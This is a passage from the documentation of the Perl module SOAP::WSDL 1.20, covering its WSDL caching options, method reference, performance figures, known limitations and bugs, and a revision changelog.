default). Filesystem caching triples performance for wsdlinit and doubles performance for the first method call. The file system cache is written to disk when the SOAP::WSDL object is destroyed. It may be written to disk any time by calling the "wsdl_cache_store" method Using both filesystem and in-memory caching is recommended for best performance and smallest startup costs. Sharing cache between applications Sharing a file system cache among applications accessing the same web service is generally possible, but may under some circumstances reduce performance, and under some special circumstances even lead to errors. This is due to the cache key algorithm used. SOAP::WSDL uses the SOAP endpoint URL to store the XML::XPath object of the wsdl file. In the rare case of a web service listening on one particular endpoint (URL) but using more than one WSDL definition, this may lead to errors when applications using SOAP::WSDL share a file system cache. SOAP::WSDL stores the XPath results in-memory-cache in the filesystem cache, using the key of the wsdl file with _cache appended. Two applications sharing the file system cache and accessing different methods of one web service could overwrite each others in-memory-caches when dumping the XPath results to disk, resulting in a slight performance drawback (even though this only happens in the rare case of one app being started before the other one has had a chance to write its cache to disk). Controlling the file system cache If you want full controll over the file system cache, you can use wsdl_init_cash to initialize it. wsdl_init_cash will take the same parameters as Cache::FileCache->new(). See Cache::Cache and Cache::FileCache for details. Notes If you plan to write your own caching implementation, you should consider the following: The XPath results cache must not survive the XPath object SOAP::WSDL uses to store the WSDL file in (this could cause memory holes - see XPath for details). This never happens during normal usage - but note that you have been warned before trying to store and re-read SOAP::WSDL's internal cache. Methods - call $soap->call($method, %data); See above. call will die if it can't find required elements in the WSDL file or if your data doesn't meet the WSDL definition's requirements, so you might want to eval{} it. On death, $@ will (hopefully) contain some error message like Error processing WSDL: no <definitions> element found to give you a hint about what went wrong. - no_dispatch Gets/Sets the no_dispatch flag. If no_dispatch is set to true value, SOAP::WSDL will not dispatch your calls to a remote server but return the SOAP::SOM object containing the call instead. Useful for testing / debugging - encode # this is how call uses encode # $xpath contains a XPath object of the wsdl document my $def=$xpath->find("/definitions")->shift; my $parts=$def->find("//message[\@name='$messageName']/part"); my @param=(); while (my $part=$parts->shift) { my $enc=$self->encode($part, \%data); push @param, $enc if defined $enc; } Does the actual encoding. Expects a XPath::NodeSet as first, a hashref containing your data as second parameter. The XPath nodeset must be a node specifying a WSDL message part. You won't need to call encode unless you plan to override call or want to write a new SOAP server implementation. - servicename $soap->servicename('Service1'); Use this to specify a service by name (if none specified, the first one in document order from the WSDL file is used). You must call this before calling "wsdlinit". - wsdl $soap->wsdl(''); Use this to specify the WSDL file to use. Must be a valid (and accessible !) url. You must call this before calling "wsdlinit". For time saving's sake, this should be a local file - you never know how much time your WebService needs for delivering a wsdl file. - wsdlinit $soap->wsdlinit( caching => 1, cache_directory => '/tmp/cache' ); Initializes the WSDL document for usage and looks up the web service and port to use (the port is derived by the URL specified via SOAP::Lite's proxy method). wsdlinit will die if it can't set up the WSDL file properly, so you might want to eval{} it. On death, $@ will (hopefully) contain some error message like Error processing WSDL: no <definitions> element found to give you a hint about what went wrong. wsdlinit will accept a hash of parameters with the following keys: caching enables caching is set to a true value cache_directory enables filesystem caching (in the directory specified). The directory given must be existant, read- and writeable. - wsdl_cache_directory $soap->wsdl_cache_directory( '/tmp/cache' ); Sets the directory used for filesystem caching and enables filesystem caching. Passing the cache_directory parameter to wsdlinit has the same effect. - wsdl_cache_store $soap->wsdl_cache_store(); Stores the content of the in-memory-cache (and the XML::XPath representation of the WSDL file) to disk. This will not have any effect if cache_directory is not set. Notes Why another SOAP module ? SOAP::Lite provides only some rudimentary WSDL support. This lack is not just something unimplemented, but an offspring of the SOAP::Schema class design. SOAP::Schema uses some complicated format to store XML Schema information (mostly a big hashref, containing arrays of SOAP::Data and a SOAP::Parser-derived object). This data structure makes it pretty hard to improve SOAP::Lite's WSDL support. SOAP::WSDL uses XPath for processing WSDL. XPath is a query language standard for XML, and usually a good choice for XML transformations or XML template processing (and what else is WSDL-based en-/decoding ?). Besides, there's an excellent XPath module (XML::XPath) available from CPAN, and as SOAP::Lite uses XPath to access elements in SOAP::SOM objects, this seems like a natural choice. Fiddling the kind of WSDL support implemented here into SOAP::Lite would mean a larger set of changes, so I decided to build something to use as add-on. Memory consumption and performance SOAP::WSDL uses around twice the memory (or even more) SOAP::Lite uses for the same task (but remember: SOAP::WSDL does things for you SOAP::Lite can't). It imposes a slight delay for initialization, and for every SOAP method call, too. On my 1.4 GHz Pentium mobile notebook, the init delay with a simple WSDL file (containing just one operation and some complex types and elements) was around 50 ms, the delay for the first call around 25 ms and for subsequent calls to the same method around 7 ms without and around 6 ms with XPath result caching (on caching, see above). XML::XPath must do some caching, too - don't know where else the speedup should come from. Calling a method of a more complex WSDL file (defining around 10 methods and numerous complex types on around 500 lines of XML), the delay for the first call was around 100 ms for the first and 70 ms for subsequent method calls. wsdlinit took around 150 ms to process the stuff. With XPath result caching enabled, all but the first call take around 35 ms. Using SOAP::WSDL on an idiotically complex WSDL file with just one method, but around 100 parameters for that method, mostly made up by extensions of complex types (the heaviest XPath operation) takes around 1.2 s for the first call (0.9 with caching) and around 830 ms for subsequent calls (arount 570 ms with caching). The actual performance loss compared to SOAP::Lite should be around 10 % less than the values above - SOAP::Lite encodes the data for you, too (or you do it yourself) - and encoding in SOAP::WSDL is already covered by the pre-call delay time mentioned above. If you have lots of WebService methods and call each of them from time to time, this delay should not affect your perfomance too much. If you have just one method and keep calling it ever & ever again, you should cosider hardcoding your data encoding (maybe even with hardcoded XML templates - yes, this may be a BIG speedup). LIMITATIONS <restriction> SOAP::WSDL doesn't handle restrictionWSDL elements yet. bindings SOAP::WSDL does not care about port bindings yet. overloading WSDL overloading is not supported yet. CAVEATS API change between 1.13 and 1.14 The SOAP::WSDL API changed significantly between versions 1.13 and 1.14. From 1.14 on, call expects the following arguments: method name as scalar first, method parameters as hash following. The call no longer recognizes the dispatch option - to get the same behaviour, pass no_dispatch = 1> to new or call $soap->no_dispatch(1); Unstable interface This is alpha software - everything may (and most things will) change. But you don't have to be afraid too much - at least the call synopsis should be stable from 1.14 on, and that is the part you'll use most frequently. BUGS Check for the correct number of elements confused with complex types If a complex type is marked optional in a WSDL file, but sub-parts are marked as required, SOAP::WSDL will die if the complex type is not found in the data (because it checks only for the occurence of simple type elements). A quick-and-dirty workaround is to turn off the check with $soap->wsdl_checkoccurs(0); Arrays of complex types are not checked for the correct number of elements Arrays of complex types are just encoded and not checked for correctness etc. I don't know if I do this right yet, but output looks good. However, they are not checked for the correct number of element (does the SOAP spec say how to specify this ?). +trace (and other SOAP::Lite flags) don't work This may be an issue with older versions of the base module (before 2.?), or with activestate's activeperl, which do not call the base modules import method with the flags supplied to the parent. There's a simple workaround: use SOAP::WSDL; import SOAP::Lite +trace; nothing else known But I'm sure there are some serious bugs lurking around somewhere. TODO - Implement bindings support WSDL bindings are required for SOAP authentication. This is not too hard to implement - just look up bindings and decide for each (top level) element whether to put it into header or body. - Allow use of alternative XPath implementations XML::XPath is a great module, but it's not a race-winning one. XML::LibXML offers a promising-looking XPath interface. SOAP::WSDL should support both, defaulting to the faster one, and leaving the final choice to the user. CHANGES $Log: WSDL.pm,v $ Revision 1.20 2004/07/29 06:56:45 lsc removed "use" dependency on Cache::FileCache. require'ing it instead. Revision 1.19 2004/07/27 13:00:03 lsc - added missing test file Revision 1.18 2004/07/16 07:43:05 lsc fixed test scripts for windows Revision 1.17 2004/07/05 08:19:49 lsc - added wsdl_checkoccurs Revision 1.16 2004/07/04 09:01:14 lsc - change <definitions> element lookup from find('/definitions') and find('wsdl:definitions') to find('/*[1]') to process arbitrary default (wsdl) namespaces correctly - fixed test output in test 06 Revision 1.15 2004/07/02 12:28:31 lsc - documentation update - cosmetics Revision 1.14 2004/07/02 10:53:36 lsc - API change: - call now behaves (almost) like SOAP::Lite::call - call() takes a list (hash) as second argument - call does no longer support the "dispatch" option - dispatching calls can be suppressed by passing "no_dispatch => 1" to new() - dispatching calls can be suppressed by calling $soap->no_dispatch(1); and re-enabled by calling $soap->no_dispatch(0); - Updated test skripts to reflect API change. Revision 1.13 2004/06/30 12:08:40 lsc - added IServiceInstance (ecmed) to acceptance tests - refined documentation Revision 1.12 2004/06/26 14:13:29 lsc - refined file caching - added descriptive output to test scripts Revision 1.11 2004/06/26 07:55:40 lsc - fixed "freeze" caching bug - improved test scripts to test file system caching (and show the difference) Revision 1.10 2004/06/26 06:30:33 lsc - added filesystem caching using Cache::FileCache Revision 1.9 2004/06/24 12:27:23 lsc Cleanup Revision 1.8 2004/06/11 19:49:15 lsc - moved .t files to more self-describing names - changed WSDL.pm to accept AXIS wsdl files - implemented XPath query result caching on all absolute queries Revision 1.7 2004/06/07 13:01:16 lsc added changelog to pod (c) 2004 Martin Kutter This library is free software, you can use it under the same terms as perl itself. AUTHOR Martin Kutter <martin.kutter@fen-net.de>
https://metacpan.org/pod/release/MKUTTER/SOAP-WSDL-1.20/WSDL.pm
CC-MAIN-2020-34
refinedweb
3,034
60.45
I have a small problem in a little project I'm doing that attempts to accurately detect function calls (not definitions) in an editor window. I only have access to the lines of text in the editor (Eg. Editor->GetLineText()) so I've wrote a few routines for tokenising the line, removing newlines, and concatenating until I receive a semicolon just in case a call goes over a single line. Now I need an accurate way of detecting what is a function call. I don't want to use a full lexical analyser, as it seems overkill, and I've no interest in understanding what the written code does, don't care about casts, etc. I was thinking of the following: A non-reserved name followed immediately by an opening bracket is a function call with the name being the name of the function. This should exclude stuff like "for(" "switch(" and "if(" for example, but I'm concerned that it'll fall over with function pointers: float (*GetPtr1(const char opCode))(float, float) Maybe If I check for the asterix before the name, it'll cure that. Any suggestions? Oh, and I'm posting this here because I don't care about parsing C++ code. So no need to worry about namespaces or classes. All code is standard ansi-compliant C code (apart from the parser itself, which is all C++).
http://cboard.cprogramming.com/c-programming/115954-accurately-detecting-function-calls-printable-thread.html
CC-MAIN-2014-23
refinedweb
232
66.37
Dependency Injection? Hello all,? Yes that compiles. DI != Spring This also compiles correctly: Spring.contains(DI) I could reference pico instead of Spring when I discuss but I'm not sure what you're trying to tell me. Basically what I have is pure dependency injection managed by a build time XSLT transform. Are you saying my solution can be simpler or that I shouldn't be looking for an entire Springframework for Mobile? I can agree with either point but I'd want more detail on the former. I am not an expert on this topic but I was contacted by Christopher Judd of a while back. He has developed a Spring framework for Java ME and was interested in working with the open source community. I haven't heard about the project lately but I pinged him on the topic. I might have more on this shortly. -- Terrence Hi Cliff76, Read your blog, and well there are some points that I would like to correct you on. While ME does not have a classloader, you can use Class.forName(), and it is very useful. As for T.D.D (Test Driven Design), I don't see where there are large hurdles. Most of the ME code (minus UI) can be run on the desktop and tested, and with some of the ME2SE projects you can even run the UIs. I think CqME is a testing framework for ME, and can be found at cqme.dev.java.net I have not heard of a spring-like framework for ME, however I have two project at Java.net that might help address the items you mentioned. The first (MicroBus) is an EDA (Event Driven Architecture)-ish component that might give you some ideas for your decoupling needs. The second is the MDO project that helps decompose objects into their parts for persistence or transmission over the wire to backend servers. (the most recent code MDO2 is more up-to-date). But to your point that ME is not a cake walk, I will agree, and that early optimization is bad, I would agree more. But heavy OOD is really bad for ME... and I would contend anywhere. ;) ....Bet I get flamed for that... Regards, -Shawn Thanx for the reply Shawn. I'm going to look into those two project you mentioned. In the interim I'm trying to find out how to address assembling or wiring the ap after it's been decomposed. In other words, I have a completely decoupled architecture, right? None of the components instantiate any dependencies. Something has to put the thing together doesn't it? I could write a java class that just pulled everything together but then when certain components need changing I'd have to edit this class and put in the new dependency wouldn't I? I guess what I'm really asking is if there is really any need for my Fallframework or if I'm over-complicating something simple? Is there another way to pull the dependency details out of code and into the build? What I'm ultimately trying to get is a way to build for different deployment targets (i.e. emulator, Blackberry, Nokia, Motorola, etc.) by suppying a profile sheet. I think of a profile sheet almost as a list of ingredients (or actual concrete instances) that go into the finished product. I will buy the fact that heavy OOD is bad for ME and that's really not my goal. I'm only after a good and completely decoupled design that may or may not follow all of the rules of OOD. Am I making any sense or do I sound more confusing and ambiguous than anything? Thanx again for responding. Cliff Cliff, Your needs of a profile sheet are spot on. Having some part of code that defines the special parts of a device, and then built into a finished (I'm inferring) device specific deployment sounds similar to how I'm looking at the problem too. I'm working on something like this but I'm looking to a very basic solution using interfaces, class loading by name, and a build script that adjusts to pull the correct device profile. While I can't go into deep details (NDA with employer), I can address the basic concept. public interface Profile { public String getStrInfo(String _key); } public class BBProfile implements Profile { private Properties bbData = new Properties(); static { bbData.put("stuff","BBProfile stuff"); }; public String getStrInfo(String _key) { return (String) bbData.get(_key); } } public class NokiaProfile implements Profile { private Properties nkData = new Properties(); static { nkData.put("stuff","NokiaProfile stuff"); }; public String getStrInfo(String _key) { return (String) nkData.get(_key); } } public class MyMidlet { private String profClass = (String)System.getProperty("profClass"); private Profile p = (Profile)Class.forName(profClass).newInstance(); } So here the property value "profClass" would be in the descriptor file, and set to whatever the build was for BB or Nokia devices, then the build would only need to include from the profile package things that start with a class name of BB or Nokia. So in the end you only have the profile class that is correct for the device in the jar, and loaded. But when you pull the information from the profile it is only that which was set in the static section of the device specific profile. Who knows if you are making it more complicated, but I feel you are thinking about a problem that most folks look at and say "device fragmentation sucks, why can't they make all devices the same" and then they walk away. Well innovation and competition is why there is fragmentation, and I would say innovation is great. Sure fragmentation sucks, but, as we are, do something about it. So keep on with your project, you may solve this or other problems in a unique way. Other may not like your way, and so they come up with another, maybe even better solution...cool now we have 2 solutions. Again Innovation is good. :) BTW: I think Jpolish has some type of reflection code generation at compile time thing...but I don't like solutions that require additional preprocessors. Feels too much like 'C', and in the end messes up the code so that you have to have some elaborate build environment instead of being able to use your favorite IDE or command line tools. But then again it's just another way of looking at the problem. To each their own. Best regards, -Shawn I wanted to include a little more detail on what I'm looking for. See my weblog for details on my experimental project that attempts to bring the Springframework to JavaME: DI != Spring, it can be much simpler than that. I've never done anything in ME, but I think the PicoContainer "philosophy" fits ME better:
https://www.java.net/node/670236
CC-MAIN-2015-35
refinedweb
1,144
73.17